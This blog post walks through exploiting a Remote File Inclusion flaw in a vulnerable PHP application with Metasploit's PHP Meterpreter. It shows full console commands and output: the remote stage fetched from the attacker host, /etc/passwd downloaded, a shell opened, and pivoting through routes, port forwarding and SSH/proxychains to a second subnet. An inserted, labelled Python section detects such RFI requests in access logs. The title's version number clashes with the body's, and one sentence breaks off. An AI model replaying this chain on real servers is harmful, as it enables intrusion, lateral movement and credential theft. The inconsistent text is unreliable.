Metasploit 4.2.1: PHP Meterpreter
By castlebbs on Tuesday 27 July 2010, 00:05 - Tools
Only two months after version 3.4.0 of the framework, version 3.4.1 has been released with a large number of new features.
Among the new features, I found this one really interesting:
- PHP Meterpreter - A protocol-compatible port of the original Meterpreter payload to PHP. This new payload adds the ability to pivot through webservers regardless of the native operating system.
Meterpreter is an advanced post-exploitation system and one of the best features of Metasploit. If you don't know what it is, I recommend having a look at the following:
- http://www.carnal0wnage.com/research/ChiCon07_Gates_Metasploit-Day2-FunStuff.pdf
- http://www.metasploit.com/documents/meterpreter.pdf
Below is an example of how to launch a Meterpreter session by exploiting a Remote File Inclusion (RFI) vulnerability in a PHP application. For this test, I used a vulnerable version of Autonomous LAN party:
- My "metasploit server" is on 192.168.142.129
- The "vulnerable linux server" hosting the vulnerable web application is on 192.168.142.128; it is also connected to a second subnet, 192.168.204.0/24, which the Metasploit server cannot reach
- A Windows "server" sits on that other subnet at 192.168.204.12
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 570 exploits - 285 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9925 updated yesterday (2010.07.25)
msf > use unix/webapp/php_include
msf exploit(php_include) > set RHOST 192.168.142.128
RHOST => 192.168.142.128
msf exploit(php_include) > set SRVHOST 192.168.142.129
SRVHOST => 192.168.142.129
msf exploit(php_include) > set PHPURI /alp/include/_bot.php?master[currentskin]=XXpathXX
PHPURI => /alp/include/_bot.php?master[currentskin]=XXpathXX
msf exploit(php_include) > set PAYLOAD php/meterpreter/bind_tcp
PAYLOAD => php/meterpreter/bind_tcp
We use the generic unix/webapp/php_include exploit with the php/meterpreter/bind_tcp payload, and then run it:
msf exploit(php_include) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.142.129:8080/Po9G2hcnGmH
[*] PHP include server started.
[*] Sending stage (35521 bytes) to 192.168.142.128
[*] Meterpreter session 1 opened (192.168.142.129:40032 -> 192.168.142.128:4444) at 2010-07-27 00:12:04 +0100
meterpreter >
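From the defender's side, the request that triggers this exploit leaves a recognisable trace in the web server's access log: a query parameter whose value is a remote URL, here the stage URL served by the Metasploit host. The Python check below is an added example, not part of the original post; the log lines are constructed, and the second one mirrors the PHPURI and stage URL shown above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format: client, user fields, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A parameter value starting with one of these schemes points an include()
# at a resource the client controls. The post's exploit used http://.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "data:", "php://", "expect://")


def find_rfi_attempts(lines):
    """Return one finding per request whose query string carries a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line; skip it
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes keys and values, so encoded payloads are caught too.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                findings.append({
                    "client": m.group("ip"),
                    "path": parts.path,
                    "param": key,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return findings


# Constructed sample lines (not real logs). Line 2 mirrors the post's PHPURI with the
# stage URL in place of XXpathXX; line 3 is the same request, percent-encoded.
SAMPLE_LOG = [
    '192.168.142.10 - - [27/Jul/2010:00:10:01 +0100] "GET /alp/index.php?page=home HTTP/1.1" 200 5120',
    '192.168.142.129 - - [27/Jul/2010:00:12:03 +0100] "GET /alp/include/_bot.php?master[currentskin]=http://192.168.142.129:8080/Po9G2hcnGmH HTTP/1.1" 200 312',
    '192.168.142.129 - - [27/Jul/2010:00:12:05 +0100] "GET /alp/include/_bot.php?master%5Bcurrentskin%5D=HTTP%3A%2F%2F192.168.142.129%3A8080%2FPo9G2hcnGmH HTTP/1.1" 200 312',
    '192.168.142.10 - - [27/Jul/2010:00:13:00 +0100] "GET /alp/include/_bot.php?master[currentskin]=default HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['client']} -> {f['path']} {f['param']!r} = {f['value']} (HTTP {f['status']})")
```

A 200 status on a flagged request, as in the constructed lines, means the include most likely succeeded and the host should be treated as compromised rather than merely probed.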
We now have a Meterpreter session. Here are examples of commands supported by the PHP Meterpreter:
meterpreter > sysinfo
Computer: castlebbs-vulnerable
OS      : Linux castlebbs-vulnerable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
meterpreter > cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       castlebbs-vulnerables.localdomain castlebbs-vulnerable
192.168.204.12  windows-server.localdomain windows-server
meterpreter > download /etc/passwd /tmp/pass
[*] downloading: /etc/passwd -> /tmp/pass
[*] downloaded : /etc/passwd -> /tmp/pass//etc/passwd
We can obtain a shell:
meterpreter > execute -i -f /bin/bash
Process 5487 created.
Channel 5 created.
ps
  PID TTY          TIME CMD
 5485 ?        00:00:00 apache2
 5486 ?        00:00:01 apache2
 6175 ?        00:00:00 sh
 6176 ?        00:00:00 bash
 6177 ?        00:00:00 ps
whoami
www-data
The Windows Meterpreter includes many more functions that make no sense in the context of a PHP exploitation (e.g. DLL injection, process migration). The really good thing about the PHP Meterpreter is that it has fully functional support for port forwarding and also allows the creation of new routes. For instance, having exploited an RFI in our web application, we can pivot through the web server and pen-test the Windows server on the other subnet, still from our Metasploit server.
First, let's have a look at the ability to add a new route:
msf exploit(php_include) > sessions -l

Active sessions
===============

  Id  Type         Information                           Connection
  --  ----         -----------                           ----------
  1   meterpreter  www-data (33) @ castlebbs-vulnerable  192.168.142.129:40032 -> 192.168.142.128:4444

msf exploit(php_include) > route add 192.168.204.0 255.255.255.0 1
msf exploit(php_include) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.204.0      255.255.255.0      Session 1
It needs to be understood at this stage that this route is not added to the operating system's routing table but to the framework itself. This means that most auxiliary modules and exploits will work directly, with their network traffic routed through the Meterpreter session. Below is an example of running scanner/smb/smb_version against the routed host:
msf > use scanner/smb/smb_version
msf auxiliary(smb_version) > set RHOSTS 192.168.204.12
RHOSTS => 192.168.204.12
msf auxiliary(smb_version) > run
[*] 192.168.204.12 is running Windows XP Service Pack 2 (language: French) (name:CASTLEBBS) (domain:WORKGROUP)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now let's have a look at the port forwarding capability. While the routing capability of Metasploit is nice, as said previously, the route is not defined at the operating system level on the Metasploit server, so no software other than Metasploit can reach the routed host directly. The command below forwards local port 222 (on the Metasploit server) to remote port 22 of the vulnerable Linux server.
meterpreter > portfwd add -L 127.0.0.1 -l 222 -r 192.168.142.128 -p 22
[*] Local TCP relay created: 127.0.0.1:222 <-> 192.168.142.128:22
Because we didn't upload a custom SSH server, we need to know valid credentials to log in (or let's say scanner/ssh/ssh_login was successful). Launching this command:
ssh -p 222 localhost -l user
will actually open an SSH session on the vulnerable Linux server: this is the port forwarding at work. But it gets better: we can now use SSH's own port forwarding options to reach ports on the Windows server directly. In the example below, local port 445 is forwarded to port 445 on the Windows server, so SMB tools can be launched locally.
ssh -L 445:192.168.204.12:445 -p 222 user@localhost
And to have the bread and the butter, we can use the SSH dynamic port forwarding option (-D, see man ssh) with proxychains on the Metasploit host, so that all traffic is redirected to the vulnerable Linux server acting as a SOCKS proxy, enabling full access to the subnet(s) connected to
Proxychains configuration (by default):
[ProxyList]
socks4 127.0.0.1 9050

# ssh -D 9050 -p 222 user@localhost
# proxychains nmap -sV 192.168.204.12
# proxychains msfconsole    # haha this even worked - but maybe not very useful since metasploit has the route option
